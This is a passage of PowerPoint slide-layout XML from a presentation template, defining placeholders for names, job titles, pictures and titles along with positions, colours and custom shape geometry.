                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74B5A528-72B7-7458-B3EE-5EE48FA04A85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="40" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3282578" y="6211751"/>
            <a:ext cx="2095081" cy="410114"/>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200" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto Thin" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1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Job title</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{262237AF-F130-BE47-AFE0-97817DF3B339}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="41"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3649427" y="4205336"/>
            <a:ext cx="1361383" cy="1362641"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent2">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DA4A7B4-3601-00E1-B350-0D84FDF5702B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="42" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6191511" y="5696972"/>
            <a:ext cx="2054888" cy="321557"/>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baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB74AFA8-7457-C814-D26F-B8E49AA43A29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="43" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6171415" y="6211751"/>
            <a:ext cx="2095081" cy="410114"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>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200" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto Thin" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1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Job title</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BBAEDC1-F753-A0BF-4850-7EF269B41791}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="44"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6538264" y="4218488"/>
            <a:ext cx="1361383" cy="1362641"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent2">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3993D172-7989-70CA-C31D-8E86E1D4EC36}"/>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bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Title here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Google Shape;70;p1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5362F33-F04B-B214-003D-D4C07B66C402}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>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5913" y="275154"/>
            <a:ext cx="1596717" cy="228941"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="739442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age picture on white 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20AAC03E-4C76-6CBD-71DC-41938F15616E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6758602" y="946554"/>
            <a:ext cx="5433398" cy="5911446"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 3356913 w 5433398"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 5911446"/>
              <a:gd name="connsiteX1" fmla="*/ 5233795 w 5433398"/>
              <a:gd name="connsiteY1" fmla="*/ 574205 h 5911446"/>
              <a:gd name="connsiteX2" fmla="*/ 5433398 w 5433398"/>
              <a:gd name="connsiteY2" fmla="*/ 723699 h 5911446"/>
              <a:gd name="connsiteX3" fmla="*/ 5433398 w 5433398"/>
              <a:gd name="connsiteY3" fmla="*/ 5911446 h 5911446"/>
              <a:gd name="connsiteX4" fmla="*/ 1172032 w 5433398"/>
              <a:gd name="connsiteY4" fmla="*/ 5911446 h 5911446"/>
              <a:gd name="connsiteX5" fmla="*/ 983217 w 5433398"/>
              <a:gd name="connsiteY5" fmla="*/ 5739571 h 5911446"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 5433398"/>
              <a:gd name="connsiteY6" fmla="*/ 3362163 h 5911446"/>
              <a:gd name="connsiteX7" fmla="*/ 3356913 w 5433398"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 591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3398" h="5911446">
                <a:moveTo>
                  <a:pt x="3356913" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4052152" y="0"/>
                  <a:pt x="4698028" y="211682"/>
                  <a:pt x="5233795" y="574205"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5433398" y="723699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5433398" y="5911446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1172032" y="5911446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="983217" y="5739571"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="375735" y="5131139"/>
                  <a:pt x="0" y="4290598"/>
                  <a:pt x="0" y="3362163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="1505292"/>
                  <a:pt x="1502941" y="0"/>
                  <a:pt x="3356913" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AAD9224-AA82-174A-E906-BDEC0D25FEA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412220" y="1871625"/>
            <a:ext cx="5663460" cy="4688973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" numCol="1" spcCol="4572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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E37BE14-6D90-437F-833E-23596E119919}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400051" y="720725"/>
            <a:ext cx="6722110"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5" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43E71017-CCAB-F183-EF2F-E3603E0BEDEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404432" y="1341737"/>
            <a:ext cx="6716234"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41473125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age B-red on white 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A135E-E729-23DB-8DAE-F1890CFABC22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="22117" b="15649"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8490857" y="2845232"/>
            <a:ext cx="3701143" cy="4012768"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E64C2903-99FA-4335-ED9B-6079045898DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412219" y="1871625"/>
            <a:ext cx="7309381" cy="4688973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" numCol="1" spcCol="4572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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EF4F6F9-D31D-589B-66E3-89DFF9F19349}"/>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10" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFF1EE1C-BF6D-4578-7931-2B4E755E8C1B}"/>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441192392"/>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53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p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="006EF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712CAA6-DF32-C7E6-E2F8-493AED394DD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402061" y="3512976"/>
            <a:ext cx="3994950" cy="1655762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="006EFF"/>
          </a:solidFill>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a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Job title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9E174FA-5969-AE40-A6B3-8C321473C8EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402060" y="2007494"/>
            <a:ext cx="6400799" cy="1325563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="A picture containing icon&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18385019-631B-61B6-4B18-B0F613B5E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844" b="12419"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6383903" y="851724"/>
            <a:ext cx="5808097" cy="6006276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1337370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age B-outline on white bg">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AAD9224-AA82-174A-E906-BDEC0D25FEA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412219" y="1871625"/>
            <a:ext cx="7309381" cy="4688973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" numCol="1" spcCol="457200">
            <a:no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 name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C3E4ADA-3178-F452-721E-D7E76540F4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2" t="-284" r="22414" b="16169"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458199" y="2845232"/>
            <a:ext cx="3733801" cy="4012768"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0110E56-8204-79AD-EA21-1A84530AE7EF}"/>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9" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04748435-DD4B-D91C-3C51-8E3DB345D7B1}"/>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4064663336"/>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535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age B-outline on blue bg">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="006E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5C26F9-4486-C223-DBF4-8A71B6D440B3}"/>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l="-682" t="-284" r="22414" b="16169"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458199" y="2845232"/>
            <a:ext cx="3733801" cy="4012768"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{392F6F10-3962-50BC-5CE5-A0011F8C274E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412219" y="1871625"/>
            <a:ext cx="7309381" cy="4688973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" numCol="1" spcCol="457200">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rgbClr val="F5F5F5"/>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D62FB442-92FB-CC18-B931-0CBCCF93AC1B}"/>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bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Title here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05F997AC-838A-3B61-F9AA-DF7B08334B4D}"/>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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CLICK TO EDIT MASTER TEXT STYLES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Google Shape;70;p1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8387F01-6A07-C1C2-1A61-536DA289C2D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>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5913" y="275154"/>
            <a:ext cx="1596717" cy="228941"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42425857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age B-red on blue bg">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52CA7F-7F05-DACC-7C6D-7481E4E7D6CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="22117" b="15649"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8490857" y="2845233"/>
            <a:ext cx="3701143" cy="4012768"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73B00D65-EA26-70B8-577E-3266AA55E273}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412219" y="1871625"/>
            <a:ext cx="7309381" cy="4688973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" numCol="1" spcCol="457200">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rgbClr val="F5F5F5"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99BB1D95-F9E5-FCD3-BD42-527681894C5B}"/>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bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Title here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0A22CDE-D4D6-E168-9891-F10CA3184EE6}"/>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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CLICK TO EDIT MASTER TEXT STYLES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Google Shape;70;p1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84C17D42-0783-C314-EED4-97E3FA896153}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>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5913" y="275154"/>
            <a:ext cx="1596717" cy="228941"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="544985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age square picture on white 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2E58A7-A947-543C-1C67-C71F49757693}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1871625"/>
            <a:ext cx="5700086" cy="4706729"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4B036B2-EF04-0EE3-050E-BE7FD64FCE63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412219" y="1871625"/>
            <a:ext cx="5165621" cy="4688973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" numCol="1" spcCol="4572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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CFAB2D5-5C87-3D9C-025D-FBB074491AF0}"/>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11" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
